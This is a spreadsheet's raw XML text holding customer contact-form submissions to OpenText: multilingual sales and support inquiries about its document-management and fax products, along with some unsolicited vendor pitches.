Bitte nennen Sie uns alle Funktionen und Features, Schnittstellen usw._x000D_
_x000D_
2.	Cloud und Managed Service: _x000D_
Bitte geben Sie uns eine Übersicht über Ihr komplettes Angebot mit allen wichtigen Eckdaten zu, Serverkonfiguration,  Serverkapazitäten, Betriebssysteme, SLAs, Skalierbarkeit, Verfügbarkeit, Flexibilität,  Konfigurierbarkeit, Administration, Performance, Schnittstellen usw._x000D_
_x000D_
3.	Preise und Lizenzmodelle: _x000D_
Bitte nennen Sie uns Ihre ausführlichen Konditionen zu Preisen, Lizenzen, Subscriptions, Vertragslaufzeiten, Wartung, Support usw._x000D_
_x000D_
4.	Demoversion: _x000D_
Bitte stellen Sie uns eine Demoversion zur Verfügung._x000D_
_x000D_
_x000D_
Können Sie uns vorab auch bitte mitteilen, ob Ihre Systeme folgende Funktionen unterstützen:_x000D_
_x000D_
-	Mandantenfähigkeit: Wieviele Mandanten können maximal angelegt werden?_x000D_
-	Multi-Project-Fähigkeit: Wieviele Projekte können maximal im CMS angelegt werden?_x000D_
-	Multi-Sites-Management: Wieviele unterschiedliche Websites mit eigenen Domains lassen sich einrichten und administrieren?_x000D_
-	Sprachvarianten: Wieviele Sprachvarianten sind möglich?_x000D_
-	Mehrsprachenfähigkeit: Welche Sprachen werden unterstützt?_x000D_
-	CMS-Benutzeroberfläche: Welche Sprachen stehen neben Deutsch und Englisch zur Verfügung?_x000D_
-	Individuelle SLAs: Lassen sich pro Website/Domain unterschiedliche SLAs im CMS und den Cloud-Services einrichten?_x000D_
_x000D_
Vielen Dank im voraus für die Zusendung der Dokumente. Für Fragen stehe ich Ihnen gern zur Verfügung._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Gina Espig_x000D_
</t>
  </si>
  <si>
    <t>Looking for Brava Viewer supporting to Documentum xCP 2.1 -- Demo</t>
  </si>
  <si>
    <t xml:space="preserve">Wir verwenden ihre Software zum Achivieren und Anzeigen von gescannten Dokumenten in SAP (6.0 ECC). nach einem Serverumzug ist jetzt die Frage aufgekommen in wie weit wir eine OCR -Lösung bereits haben oder unter welchem Aufwand wir eine solche Lösung integrieren könnten. _x000D_
_x000D_
Gruß _x000D_
_x000D_
T. Siemon </t>
  </si>
  <si>
    <t>We are looking for EDI VAN service to exchange business information with our clients and partners.</t>
  </si>
  <si>
    <t>TechPubs, LLC with 35 years of experience in technical writing, Updating of existing manuals, translation, drafting-isometrics and electrical drawings. I.E.T.M., XML CGM, validation at the air craft._x000D_
Customers: Lockheed-Martin, Air force, all technical writers are engineers. I wish I could send you a company profile._x000D_
Regards, Mario</t>
  </si>
  <si>
    <t>ECM - OCR Capabilities</t>
  </si>
  <si>
    <t>Looking for a demonstration of the capability in order to provide solutions for an enterprise document management with current and new clients.  We are looking to help a current client upgrade their current EMC Documentum product to a new platform.  Their current document repository is about 400 million scanned documents.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, Sales._x000D_
As you may know, SYNNEX Corp. is a North American IT distribution company, supplying hardware and software vendors to reseller customers and not directly to end users. _x000D_
May I request a quote for the following? Please advise if you offer distribution/reseller discounts._x000D_
_x000D_
Vendor: Open Text _x000D_
Product:Open Text – AutoMerge Teeform license_x000D_
Qty:1_x000D_
Also, would it be possible to receive a complete Parts/Product List; including Part #s &amp; distributor/reseller discounts?_x000D_
_x000D_
I look forward to your reply._x000D_
_x000D_
Thanks,_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in obtaining Email Database of Pharmaceutical Manufacturing Industry Executives?_x000D_
_x000D_
This list Contains Company name, Web address ,Contact name, Phone number, Email address, Title, physical address, City, State ,Zip Code, Country, Phone number, Fax Number, Employee size, SIC Code and last verified date._x000D_
_x000D_
Among other services we offer: Global B2B list, Custom list, Technology list, E-appending and other data appending services._x000D_
_x000D_
Please let me know your interest and schedule for a quick call to discuss in detail. If there is someone else in your organization that I need to speak in this regard, it would be very grateful if you could provide their details or forward this email to him/her. Thanks in advance for your help!_x000D_
_x000D_
Await your response…._x000D_
_x000D_
Warm Regards_x000D_
Julie Channing</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,_x000D_
We are currently working on updating our W9’s. The W9 that we have on file for Xpedite System, LLC is older than 2015. Could we get a current W9 to put in our folder? Your help would be greatly appreciated._x000D_
</t>
  </si>
  <si>
    <t>Need to pass off an existing client to another eDOCS reseller/partner who can provide on-going support and has Case Management/Records Management experience. Customer has outgrown our capability and needs assistance with long-term planning and execution for managing electronic content.</t>
  </si>
  <si>
    <t>I am interested in learning of Owner Operators of refineries who have implemented Open Text Content Suite as their ECM system globally with an emphasis in EMEA region.  _x000D_
_x000D_
We are in the early stages of exploring possible ECM systems.  Your response would be very helpful in this first step.</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in learning of owner operators who have implemented Documentum Asset Operations globally with an emphasis in EMEA region.  If you can provide details about implementations that would be useful._x000D_
We are in the early stages of exploring possible ECM systems.  Your response would be very helpful in this first step._x000D_
_x000D_
Thanks + Regards,_x000D_
_x000D_
Ryan_x000D_
</t>
  </si>
  <si>
    <t>Looking for a hipaa compliant fax solution</t>
  </si>
  <si>
    <t xml:space="preserve"> Lidl US LLC for 850 (Purchase Order) and 856 (Advanced Ship Notice</t>
  </si>
  <si>
    <t>I am testing Brava Desktop and I am not able to have two different users to annotate the same document at the same time. Is it possible?</t>
  </si>
  <si>
    <t>Looking for pricing for 3500-4500 mailbox archiving for exchange using the OpenText Email Archiving for Microsoft Exchange solution</t>
  </si>
  <si>
    <t>Hi there. We are an independent research firm that provides proprietary SELL investment ideas to institutional investors. We currently have an encryption solution in place, but our encryption provider's offering has several frustrating limitations. Hence my outreach. We are evaluating alternatives to our present encryption provider. Please call me at your earliest convenience. Thanks! Best, Zach (917-597-3177)</t>
  </si>
  <si>
    <t>Looking to inquire about eDocs costs and pricing.</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot log into my account.  I selected the reset password button, but have not received the email to reset the password.  </t>
  </si>
  <si>
    <t>I am looking for HIPAA compliant digital fax and document management solutions for my company</t>
  </si>
  <si>
    <t>I am the only one that consistently uses the Provision Tool at my company. Hence, they are doing away with it as a corporate licensed software. What are my options for keeping the Provision capability, but in a single user fashion?</t>
  </si>
  <si>
    <t>Looking for who our Account Manager is.  Thank you</t>
  </si>
  <si>
    <t>I'd like to set up a confirmation email to all members whom send faxes out, rather than doing it individually.</t>
  </si>
  <si>
    <t>hi team, is there someone that can answer compatibility questions in regards to a OpenText/RightFax solution a customer is setting up.</t>
  </si>
  <si>
    <t xml:space="preserve">                Me chamo Fábio, trabalho no escritório de projetos da Unicred do Brasil em Porto Alegre. Iremos iniciar um processo de RFQ para cotação de soluções de ECM e BPMS. Gostariamos da participação da sua empresa. Se houver seu interesse, favor encaminhar contatos comerciais.</t>
  </si>
  <si>
    <t>Want to expand our usage of VIM to other entities and make sure we are familiar with and utilizing all the bells and whistles available to us.</t>
  </si>
  <si>
    <t>I would like to have a better understanding of how OpenText could help us, as well as get a budgetary quote._x000D_
Thank you !</t>
  </si>
  <si>
    <t>Hello,_x000D_
I would like to know if there is StreamServe preview servers for the MacOS. Thanks in advance!_x000D_
Best Regards,_x000D_
Andrei Apekunou.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir sind aktuell auf der Suche nach einem DMS, welches unsere kaufmännischen und klinischen Prozesse unterstützen kann. Wir setzen aktuell SAP FI / ishmed ein._x000D_
_x000D_
Ich würde mich freuen, wenn wir einen Termin in unserem Hause vereinbaren könnten._x000D_
Senden Sie mir doch bitte 2-3 Terminvorschläge ab 10.07.2017._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Timo Dreger</t>
  </si>
  <si>
    <t>interested in teleform license</t>
  </si>
  <si>
    <t>Interested but unable to attend FREE WORKSHOP: Creating Personalised Analytics and Insights on 15/5/2017 - will there be any sessions on other dates? Please let me know_x000D_
thanks_x000D_
Kylie</t>
  </si>
  <si>
    <t xml:space="preserve">E-fax error received_x000D_
Reason for failure: Service denied _x000D_
Your account is denied service.  Please contact us and we will work with you to resolve the problem. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, Would you interested in  Salesforce  Technology Customers from UK.?_x000D_
_x000D_
We have  22,670 Tele verified database of  Salesforce  Technology  Customers from UK.(Newest  2017)._x000D_
_x000D_
Kindly revert with your requirement for a test file._x000D_
_x000D_
We have also available Tele verified database of Salesforce Desk, Salesforce Force.com, Salesforce Radian6,Salesforce Marketing Cloud, Salesforce Heroku, Salesforce Service Cloud, Technology  Customers from UK._x000D_
_x000D_
Cheers,_x000D_
_x000D_
Delphine Griswold_x000D_
CMO_x000D_
Lead pool_x000D_
Email:delphine.griswold@lead-pool.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
we need an offer for the software "Unify Report Builder 6.2." Please send it to: sina.ortel@dehn.de_x000D_
_x000D_
thanks_x000D_
_x000D_
Best regards_x000D_
Sina Ortel</t>
  </si>
  <si>
    <t>Hi support team,_x000D_
I'm mailing to you about the installation package of Brava 16.2.I'm working on the integration request of Brave for Documentum Webtop version 16.2 with our FirstDoc product version 7.04. I'm wondering that where can I find the installation package for that? Are there any requirement for us need to be done to get this package?</t>
  </si>
  <si>
    <t>I would like to know what PDF editors apart from Adobe Acrobat integrate well with OpenText._x000D_
_x000D_
Regards,_x000D_
Maxine Arentz</t>
  </si>
  <si>
    <t>I have a client in China interested in learning more about Media Manager. I see you have an office in Beijing. Does MM have a Chinese interface? Do you have any brochures in Mandarin I could send them?</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
I want to know if the Web Client tool is included at no cost if I purchase the RightFax Business Server. The idea is that end users can manage faxes via web-browser._x000D_
_x000D_
Regards,_x000D_
_x000D_
- Adrian Saavedra.</t>
  </si>
  <si>
    <t>Hi, _x000D_
I am reaching out on behalf of a company called Dainty Home. Currently they sell on Boscovs through CommerceHub. Boscovs made them aware that they will no longer integrate through CommerceHub but instead through you. What are the options for integration with your system for receiving orders, sending tracking, and sending inventory? Do you offer any sort of flat file integration through FTP?_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">As a career. I'm looking to work over the summer </t>
  </si>
  <si>
    <t>Quality Management System</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am Pawarat from Data Express, a software reseller from Thailand. I am submitting this form because I am unable to contact George Lau(glau@opentext.com)._x000D_
_x000D_
One of our customer needs to purchase 4 licenses of OpenText Exceed with 1 year maintenance. So I requested for a reseller price from George, but he does not reply my email since May 26. _x000D_
 _x000D_
Please kindly help me to get to him or any other sales representative._x000D_
_x000D_
Regards,</t>
  </si>
  <si>
    <t>Looking for Enterprise connect version that works with office 2016.</t>
  </si>
  <si>
    <t>question on SMS delivery integration with opentext for a potential client</t>
  </si>
  <si>
    <t>I have attempted twice now this week to fill out my informaition at the following page so I can download the Free Brava DWG Viewer: http://www.opentext.com/what-we-do/products/enterprise-content-management/content-centric-applications/try-it-now/free-brava-dwg-viewer_x000D_
_x000D_
 After I submit my information the website tells me I receive an email with a download link....but I am not receiving the email and our spam filter is not capturing it either. Can you please send me the link to download it?_x000D_
_x000D_
Thank you-_x000D_
Steve McElroy</t>
  </si>
  <si>
    <t>Information regarding Opentext Extreme print management</t>
  </si>
  <si>
    <t>I would like a high level estimate of costs related to implementation and ongoing licensing for a customer communication management platform.  This is not to be used for approval of funding purposes, but rather for general alignment and expectation._x000D_
Description:_x000D_
Enterprise solution that may be leveraged across applications to facilitate communications across all channels providing for a consistent, personalized customer experience.  This solution leverages content from various avenues including content marketing as well as leverages preferences obtained from online banking, etc. (mastered in MDM).  The tool will manage and deliver customer communications via a workflow/rule engine for multichannel output of communications including via interactive (negotiated documents, policies, ID cards), on-demand (quotes, online statement generation, account notices), and structured outputs (financial statements, digital print runs of marketing, alerts and notifications).  Customer communications management provides for increased capability to be compliant with regulatory standards._x000D_
1 - Discovery/scoping phase to determine approach for customer communication portal and touchpoints to Digital Banking Experience, CEH, mobile and online, etc.  Understand full scope of needs and priorities._x000D_
2 - Product review and selection_x000D_
3 - Implementation via phased approach</t>
  </si>
  <si>
    <t>We are replacing a computer with Brava on it and i need to know how to transfer the license over. _x000D_
Thanks</t>
  </si>
  <si>
    <t>I want to be your reseller.</t>
  </si>
  <si>
    <t>I want to be your reseller</t>
  </si>
  <si>
    <t>Hello,_x000D_
When checking the OT website and the page about the partnership between OpenText and Deloitte, I noticed that there is a broken link on the following page: http://www.opentext.com/what-we-do/partners-and-alliances/strategic-partners/deloitte-and-opentext_x000D_
_x000D_
Would it be possible to change the broken link (http://www.deloitte.com/us/InformationManagement) to the following working link: https://www.deloitte.com/be/EMEACoE_OpenText ?_x000D_
_x000D_
Thanks!_x000D_
Kind regards,_x000D_
Mathijs</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Ryan Wilinski, and I am the Director of Communications at Advameg, Inc. I am hoping to get in touch with your webmaster or other individual who manages the domain names your company owns, as our organization is interested in purchasing the Eloquent.com domain for a project we are currently developing._x000D_
_x000D_
I would greatly appreciate if you could put me in contact with the appropriate person to discuss this matter. I can be reached by email at ryan@advameg.com or by phone at (630) 890-5682. Thank you in advance, and I look forward to hearing from you!_x000D_
_x000D_
Regards,_x000D_
Ryan Wilinski</t>
  </si>
  <si>
    <t>I cannot login.  I tried to reset my password but it didn't work.  I doesn't give me a error but it doesn't open either.</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to schedule a demo for the purpose of handling a request from a department to get and keep their documents electronically filed.  </t>
  </si>
  <si>
    <t>Hello, We currently use your eDocs software but we are interested in your Redact-it Software. Could you please send me a quote for 30 licenses? Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Hello - We have been using Documentum since 2003.  As a pharmaceutical customer, we are required to perform a periodic audit of Documentum as a software vendor. Is there a contact of either the Documentum or Open Text organization in the Chicago area that we could contact to perform a vendor audit ? Also, to assist with the audit, would your organization be able to provide an external audit report that we could reference to assist in completing the audit ? _x000D_
_x000D_
Jolynn Gallis _x000D_
Manager, IT Compliance _x000D_
_x000D_
Fresenius Netcare Region North America _x000D_
Three Corporate Drive _x000D_
Lake Zurich, Illinois 60047 _x000D_
T: +1 847-550-5588 _x000D_
Jolynn.Gallis@Fresenius-Netcare.com _x000D_
_x000D_
Link zu gesellschaftsrechtlichen Pflichtangaben und Vertraulichkeitshinweis / Link to corporate information and confidentiality notice _x000D_
http://www.fresenius.de/Fresenius_Netcare_GmbH.htm </t>
  </si>
  <si>
    <t>Need My Support access</t>
  </si>
  <si>
    <t>Issues with logging into account. Account# US01-103923</t>
  </si>
  <si>
    <t>I need a Sales and a Technical contact for a conference call on Thursday June 8th at 2:00 pm.  We will be discussing a possible purchase and upgrade of our existing infrastructure.</t>
  </si>
  <si>
    <t>No puedo ingresar a mi cuenta de Knowledge de OpenText.</t>
  </si>
  <si>
    <t>Hello, I am looking for the lead sales contact with reference to the Sirius XM DAM RFP that is in the offing currently.  I have scoured your website and your LinkedIn but found no other way of contacting you by web.  Please could you direct me to someone appropriate with the utmost haste?_x000D_
_x000D_
Thank you_x000D_
Dominic Briggs</t>
  </si>
  <si>
    <t>Need assistance with TeleForm Reader and AutoMerge Publisher.  Need to know how to set them up as services.</t>
  </si>
  <si>
    <t xml:space="preserve">I did not join media bin.  I am a 77 year old resident off The Village - a care facility, because I had a stroke.  I consulted my lawyer and he said he will write a letter to the Canadian government and the U.S. Better business bureau if the following things are not done:  1] My name is removed from the rolls because it shouldn't be there. 2] My money is returned immediately.($1.00, $39.99, and $1.12)  I am sending a copy of this letter to my lawyer to prove I did inform you about the problem.  I would appreciate an immediate response by email with your intentions. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Gilda's Club Toronto https://gildasclubtoronto.org/ has a project they are looking to develop for their members.  They want to create a digital ecosystem around a web app with backend to reduce isolation and deal with bookings, events, notifications._x000D_
_x000D_
I think this may be of interest to you.  They need a commercial partner onboard quickly because of a funding deadline.  _x000D_
_x000D_
Please give me a call as soon as you can: 416 561 0533_x000D_
_x000D_
Many thanks,_x000D_
Tom_x000D_
</t>
  </si>
  <si>
    <t>To whom may concern,_x000D_
_x000D_
We would like to know if there is any product or connector that can allow us to integrate OpenText with Office 365 in any way as we already know that there is an existant product with SharePoint 2013 on-premise._x000D_
_x000D_
At this moment we are interested in Search capabilities, allowing us to use the Office 365 Search into your documental repository and being capables of requesting any information or metadata to be shown into SharePoint Online Search Results._x000D_
_x000D_
Could you inform us about any product or service if you have and its potential cost?_x000D_
_x000D_
Thank you in advance and hope your soon reply._x000D_
_x000D_
Best regards,_x000D_
Angel David Carrillo.</t>
  </si>
  <si>
    <t>My wife purchased a rolling carry on for me a couple of years ago. The wheels are now coming apart. Is it possible to repair this unit???_x000D_
It is similar to your catalog number MLC581. I would appreciate a response. This is the second contact I have sent.</t>
  </si>
  <si>
    <t>Looking for a fax solution for our company. Currently have a ShoreTel phone system with Sip trunks.</t>
  </si>
  <si>
    <t xml:space="preserve">I have nearly 20 years of experience ad a Public Information Officer, for the California Department of Transportation. I have extensive experience working with out Legal staff, on potential claims, researching the claims background and  volidity. I also have exceptional attention to detail and  Outreach skills. When I first read about your products a couple years ago, I thought I would try to improve upon your existing product. I think it needs to be packaged with a means to capture the meeting and decision making discussions of Enterprise. This could be accomplished without diffuculty. </t>
  </si>
  <si>
    <t>Would like to upgrade the Document Presentment from 5.6.1 to Version 16 which is the latest one.  We want to understand the upgrade approach and dependencies here.  Currently this one is used with the SAP ECC system.  Kindly guide us.</t>
  </si>
  <si>
    <t>Need a demo of Customer communication enterprise solution for a customer using Microsoft Dynamics 365 for operations.</t>
  </si>
  <si>
    <t>Good morning, I would like some assistance to verify that my companies fax server is up to date, and to look into possible updates and upgrades. please call anytime M-F 7:30-4:00</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Novia Financial PLC has account 87658 with yourselves and we recently received an invoice for our Easylink Services. Listed items were:_x000D_
New charges Easylink services_x000D_
IDM monthly fee_x000D_
Outbound fax_x000D_
Inbound fax_x000D_
_x000D_
The invoice amount was approximately £230 per month inclusive of tax._x000D_
_x000D_
Based on our usage are you able to tell me whether we are on the most cost effective plan that you offer?_x000D_
_x000D_
Many Thanks_x000D_
James Taylor </t>
  </si>
  <si>
    <t>Need some ball park number of cost for products._x000D_
HP Extream + Dialogue	8.0.333 Live Editor - 4.5_x000D_
HP Command Center	2.3.2_x000D_
Duration 3 months_x000D_
_x000D_
Can some one help on this quickly ?</t>
  </si>
  <si>
    <t>I'm looking for Enterprise email archival solution which will archive users' incoming and outgoing emails automatically via some Outlook client plugin to our on premise Enterprise SAN storage for backup and restoration in the case of user PC crash. Thks.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Je me présente, Thomas Ramé, je travaille au Crédit Mutuel Arkéa (groupe bancassurance) en tant que chef de projet à l'innovation et j'aurais aimé avoir plus de renseignements sur le projet Magellan._x000D_
_x000D_
J'avais déjà vu la keynote 2016 annonçant ce projet et je voulais savoir si depuis juillet dernier il y avait un document détaillé (type powerpoint client...) pour présenter l'ensemble des uses cases possibles et des solutions proposées ? Par exemple s'il y aura la reconnaissance d'émotion... ou encore peut-être un comparatif entre ce que propose IBM Watson et ce que vous comptez sortir sous le projet Magellan ?_x000D_
_x000D_
Il me semble qu'il y aura un annoncement à Toronto en juillet concernant Magellan, je tâcherai de le suivre mais ces informations en amont nous aiderait grandement à mesurer le potentiel de votre solution._x000D_
_x000D_
Pouvez-vous aussi me dire si les briques de ce projet seront "entraînées" pour la langue française ? Ou si seul l'anglais est visé au début, et avec un souhait d'inclure d'autres langues ?_x000D_
_x000D_
Merci par avance pour votre réponse,_x000D_
_x000D_
Cordialement,_x000D_
Thomas Ramé_x000D_
</t>
  </si>
  <si>
    <t>New requirment please get in touch with me</t>
  </si>
  <si>
    <t>I need a quote as soon as possible ! today if needed</t>
  </si>
  <si>
    <t>Hey Opentext,_x000D_
 _x000D_
I recently came across your website and noticed you have previously linked to www.fixr.com/ and I was wondering if you could add one more link to this article for a reasonable fee?_x000D_
_x000D_
This is the article I am talking about: http://opentext.com/data-driven-digest-for-april-24/_x000D_
_x000D_
I can pay straight away via paypal if you can send me an invoice._x000D_
_x000D_
My marketing budget is not big at all, but hopefully we can agree on an amount of money that makes it worthwhile for you to take a few minutes to add one more link to the article._x000D_
_x000D_
Have a great day and let me know if you have questions.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello! I need the Product Activation Key for Gupta Team Developer:_x000D_
Product Version: 6.1.00_x000D_
Product Media Code: 1980DAD2-DE82B6F3-C52B5FD4-D6C71048_x000D_
Activation Code: 0A5B179C-EEA794A9-FB9B5DFC-7876E00D_x000D_
_x000D_
Thank you very much in advance!_x000D_
Kind regards, Mitja Ledowski_x000D_
</t>
  </si>
  <si>
    <t>Hi Sir,y_x000D_
I registered for the discussion forum 3 days before and  still didn't receive the activation link to mailid. Can you please forward me the same.</t>
  </si>
  <si>
    <t>We are working for an US based opportunity. Where client is using your Teleform product. We need to provide support services for your application. Could you provide us the rough estimate of the training cost of Teleform.</t>
  </si>
  <si>
    <t>We are working for an US based opportunity. Where client is using your Rightfax product. We need to provide support services for your application. Could you provide us the rough estimate of the training cost of Rightfax.</t>
  </si>
  <si>
    <t>Vendor Invoice Management solution for SAP_x000D_
_x000D_
Would like to know more about VIM preferably from your partner here in the Philippines.</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
Interested in VIM training courses. Do contact me for more information on this._x000D_
_x000D_
Regards_x000D_
Larry Yu</t>
  </si>
  <si>
    <t>Hello my friend,_x000D_
_x000D_
Do you have any PCB or PCBA project recently?_x000D_
_x000D_
We are a professional manufacturer in China with specialization in PCB+PCBA turnkey services, from prototype to mass production._x000D_
Our advantage concentrate on components with fast quoting, competitive price, authenic brand and no MOQ rule(it may resolve your inventory troubles)._x000D_
_x000D_
Offering: various pcb &amp; fpc, pcb assembly service with smt&amp;dip, components, stencil, plastic shell, mold,cables..._x000D_
_x000D_
If you have any need for these, I will be very glad to help you. :)_x000D_
_x000D_
Hope hearing from you! Thanks!</t>
  </si>
  <si>
    <t>只需简单两步即可获取专属7*24小时在线英语客服，让你的网站询盘翻倍。 _x000D_
 _x000D_
本周有免费试用名额，详情请咨询QQ：2837822473 _x000D_
 _x000D_
或登录官网查看详情：http://www.xiaoyichat.com</t>
  </si>
  <si>
    <t>How can I temporarily cancel my subscription? I won’t be getting order from my vendor through this year so I would like to cancel the subscription until I have an order or vendor to work with.</t>
  </si>
  <si>
    <t>Hi, I am managing an RFP process for a major US broadcaster for a new DAM system. Please can you have someone from your sales team reach out asap to help manage the process. This is a New York/East Coast based major broadcaster. This is a time sensitive request. Thank you!</t>
  </si>
  <si>
    <t>Queue Manager on Open Text side with connection to/from Deutsche Bank MQMs MQE1 and ME11 dont support SHA256. New Certs from Deutsche up from 17.06. require SHA256 support (MQ Version 7.1 or fix pack required). Our contact person Brad Lovell cant organize the MQ-Version upgrade since more than one year. I know its normally stated via official documents from Open Text that you have official support strategy for SHA256 and your company requires given support also from own interface partners._x000D_
Please do the needful. Thank you and with kind regards Uwe Singer</t>
  </si>
  <si>
    <t>Two fold. We are currently running a POC with the demo license.  Is there a way to extend that for 30 days?  I also require a quote for two copies of Rightfax, 4 channels each and FOIP enabled, with the External Document Connector licensed as well.</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested on changing our software to create afp and pdf files . </t>
  </si>
  <si>
    <t>We are Documentum users since 2014. Our company is evaluating change to eDocs. We need to contact a local representative to assist us in this process</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested in acquiring our 2.5+ million Global Healthcare and Pharmaceutical Email database?_x000D_
Our healthcare database includes:_x000D_
•	Doctors and Physician with 120+ specialities_x000D_
•	Decision makers from medical offices, hospitals across all departments_x000D_
•	Decision makers Pharmaceutical companies_x000D_
•	Nurses_x000D_
•	pharmacies and other healthcare sites etc_x000D_
Our database include verified email address along with multi channel marketing detail like NPI Number, company name, company website, contact name, contact title, address, phone, fax, SIC Code, employee size, revenue size, SIC code, industry descriptions etc_x000D_
_x000D_
Among other services we offer: Global B2B list, custom list, Technology list, email appending and other data appending services._x000D_
_x000D_
Please let me know your interest and schedule for a quick call to discuss in detail. If there is someone else in your organization that I need to speak in this regard, I would be very grateful if you could provide their details or forward this email to him/her, thanks in advance for your help!_x000D_
_x000D_
Await your response…._x000D_
_x000D_
Best Regards._x000D_
Lisa Brown_x000D_
</t>
  </si>
  <si>
    <t>We are in the early process of looking for ECM and would like to set up a demo.</t>
  </si>
  <si>
    <t xml:space="preserve">Madame, Monsieur,_x000D_
_x000D_
Nous sommes une société de conseil en fusion et acquisition basée à Lyon qui fournit des services de fusions et acquisitions aux entreprises numériques._x000D_
Nous sommes mandatés par un intégrateur de votre solution ECM "Documemtum". Cette entreprise souhaite développer ses activités en Allemagne. Avez-vous une liste des intégrateurs allemands de Documemtum ? Sinon, savez-vous où nous pouvons obtenir ces informations ?_x000D_
Vous remerciant par avance._x000D_
Cordialement,_x000D_
Guillaume Gourgaud_x000D_
Consultant_x000D_
g.gourgaud@kaph-partners.com_x000D_
</t>
  </si>
  <si>
    <t>I need to get a quote for the XML generator.  We have RightFax enterprise 10.5.1.5235</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam,_x000D_
_x000D_
We are a merger and acquisition advisory firm based in Lyon (France) that provides M &amp; A services to digital businesses._x000D_
We are mandated by an integrator of your ECM solution : Documemtum. This company wants to develop its activities in Germany. Do you have a list of the German integrators of Documemtum? Otherwise, do you know where we can get these informations?_x000D_
Thanking you in advance._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Guillaume Gourgaud_x000D_
Consultant_x000D_
g.gourgaud@kaph-partners.com_x000D_
</t>
  </si>
  <si>
    <t>We need pricing and a demo, we are trying to see if opentext fits our budget and requirements.</t>
  </si>
  <si>
    <t>Hi IT dpt,_x000D_
 _x000D_
My name is Facundo Benitez and I'm an Account Manager at Palermitano Solutions LLC. _x000D_
 _x000D_
We are an IT and AV integrator and we are current suppliers for companies such as Google and Uber. _x000D_
 _x000D_
I’d love to schedule some time to understand your IT infrastructure a bit more. I’ve read up on some of the great work you are doing with your OpenText extreme app, and would love to learn more about your initiatives for 2017 to see if there might be opportunities for Palermitano and your company to collaborate with each other moving forward.  _x000D_
 _x000D_
What does your availability look like for a quick call or VC this week or the following?_x000D_
 _x000D_
Just let me know,_x000D_
Facundo._x000D_
Account Manager at Palermitano Solutions.</t>
  </si>
  <si>
    <t>Would like info and a demo of Content Hub for Publishers. Best contacted by email.</t>
  </si>
  <si>
    <t>Hi Opentext staff! _x000D_
_x000D_
I know this is likely not the correct email or the best way to connect, but if you could direct me to whoever takes care of in house catering (if you do in house catering) or an office manager, I would really appreciate it! _x000D_
_x000D_
I would love to e-introduce myself and have the chance to discuss catering opportunities at your company at your KW location!  I would like to present a catering proposal to you for daily and/or weekly meals. Gilt has been very involved with catering to the Kitchener-Waterloo region (particularly tech companies), bringing daily lunch and dinner to some of the largest tech companies in Kitchener and other businesses in Waterloo. Our prices are extremely competitive, typically we are able to provide lunch or dinner at close to $8/meal. We are reliable and creative, and like to provide our clients with something new, delicious and exciting every single time we work with them. _x000D_
_x000D_
If you have not heard of Gilt, we are a contemporary restaurant in Downtown Kitchener. We have a passion for excellent food, service and atmosphere and we are bringing this experience to the offices of some of the most influential companies in the region! Check out our instagram page (@giltrestaurant) for photos of our in house food, but also a series of catering dishes as well! _x000D_
_x000D_
Please let us know if there is any opportunity here to learn more about what you do and your catering needs. We greatly appreciate your time and consideration with this._x000D_
_x000D_
The best email to contact is; giltrestaurant@gmail.com_x000D_
_x000D_
Trella_x000D_
_x000D_
-- _x000D_
Gilt Restaurant, Bar and Lounge_x000D_
305 King Street West, Kitchener _x000D_
Start Sharing at Gilt</t>
  </si>
  <si>
    <t>I need clarification on some products that Finance is having me review. Can someone please contact me by email so I may provide more details?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kayleen Kirby</t>
  </si>
  <si>
    <t xml:space="preserve">I’m writing a email to check if you would be interested in reaching SAP Users ? We can find your prospects across USA, UK, Canada and rest of the countries and 3.5 million technology users such as Oracle, Sage, Sales Force, ERP, AVIA Users Mailing List etc…_x000D_
_x000D_
You can reach:  SAP HRMS,  SAP HANA,  SAP Plantation, SAP Net Weaver, SAP CRM, SAP Users USA,  SAP ACT, SAP Business Users, Quick Book and other SAP Products etc…_x000D_
_x000D_
The list contains complete Business information such as Contact Name, Company Name, Website URL, Title / Department, Address, State, City, Zip Code, Phone Number, Fax Number, Revenue Size, Employee Size, SIC Code, Permission based email address &amp; Technology etc…_x000D_
_x000D_
If you need any kind of list including above or any other sectors professionals. Kindly let us know your required target criteria. So that I can send you counts and more information._x000D_
_x000D_
Look forward to hear from you soon…_x000D_
_x000D_
_x000D_
Best Regards,_x000D_
-- Tom Connolly --_x000D_
Demand Generation Specialist_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi - we are looking for a partner to migrate ECMs into a nosql ECM. Source ECM are typical popular ones. Would like to have a discussion._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Brava Desktop License_x000D_
We have a user who uses Brava Desktop 7.2 and was recently migrated to a new computer, however, the documentation for Brava Desktop is from before it became OpenText, and the link referenced to generate a key no longer exists:_x000D_
_x000D_
1. Go to our serialization web site at: http://licensing.infograph.com/LogIn.asp?localization=US _x000D_
2. Enter the provided Software ID and PIN:_x000D_
       Software ID: a036000000jkYJK_x000D_
       Software PIN: 402614_x000D_
